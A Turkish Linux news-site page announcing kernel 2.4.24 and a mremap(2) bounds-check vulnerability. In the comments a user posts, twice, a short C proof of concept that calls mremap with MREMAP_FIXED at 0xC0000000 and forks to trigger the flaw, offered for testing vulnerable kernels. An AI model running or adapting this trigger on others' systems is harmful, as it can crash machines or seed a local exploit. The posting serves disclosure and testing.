Kernel 2.4.24 Çıktı

Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt

Görüşler

bahadirkandemir
yaklaşık 22 yıl önce

NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}

realist
yaklaşık 22 yıl önce

ne #include ediyoruz?
hangi #include ?

bahadirkandemir
yaklaşık 22 yıl önce

Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}

Görüş belirtmek için giriş yapın...

İlgili Yazılar

Slackware 10.0 Çıktı

Challenger
24 Haziran 2004, 1 dakika okuma süresi

Tüm zamanların en sert Linux dağıtımı Slackware'in 10.0 sürümü duyuruldu. Daha önce bu haberde de duyurulduğu gibi XFree86 yerine X.org' un 6.7.0 sürümünü kullanan Slackware 10.0, ön tanımlı çekirdek olarak Linux 2.4.26 ile geliyor. Ancak, Linux 2.6.7 de opsiyonel olarak pakete eklenmiş. GCC 3.3.4 (GCC 3.4.0 da alternatif olarak dağıtımda mevcut), Mozilla 1.7, GNOME 2.6.1 ve KDE 3.2.3 paketlerlerini de içeren sürüm ile ilgili ayrıntılı değişiklik kaydı ve iso dosyalarına aşağıdaki adreslerden ulaşabilirsiniz.

Değişiklik Kaydı: http://www.slackware.com/changelog/i386/ChangeLog-stable.txt
ISO Dosyaları: http://www.slackware.com/torrents/index.html

Linux World´den Linus Torvalds röpörtajı

tongucyumruk
16 Kasım 2002, 1 dakika okuma süresi

Linux World, ruhani liderimiz Linus Torvalds ile yaptığı röpörtaj'da şimdiye kadar birçok kimsenin sormaya çekindiği soruları cesurca soruyor; Linux ve Linus ile ilgili karanlıkta kalmış birçok noktayı aydınlatıyor. İşte Linus Torvalds'ın gerçek yüzü.

GENTOO Türkçe Belgeler

yilmaz
13 Kasım 2005, 1 dakika okuma süresi

Kanaatimce en hızlı linux dağıtımı olan Gentoo için Goeksel Togan tarafından hazırlanan belgelere (Başlangıç için Kurulum ve Kullanım rehberi) http://belgeler.gentoo-tr.com/ adresinden ulaşabilirsiniz.

Ottowa Linux Sempozyumundan Makaleler

sundance
6 Temmuz 2002, 2 dakika okuma süresi

Internet`te dolaşırken şöyle bir dökümana rasladım. 26-29 Hazinran tarihleri arasında yapılan Ottowa Linux Sempozyumundaki bildirgelerin toplandığı 600 sayfalık bir pdf.

3Mb`lık bir download, bence kesinlikle değer bir okuyun.

Bazı başlıklar...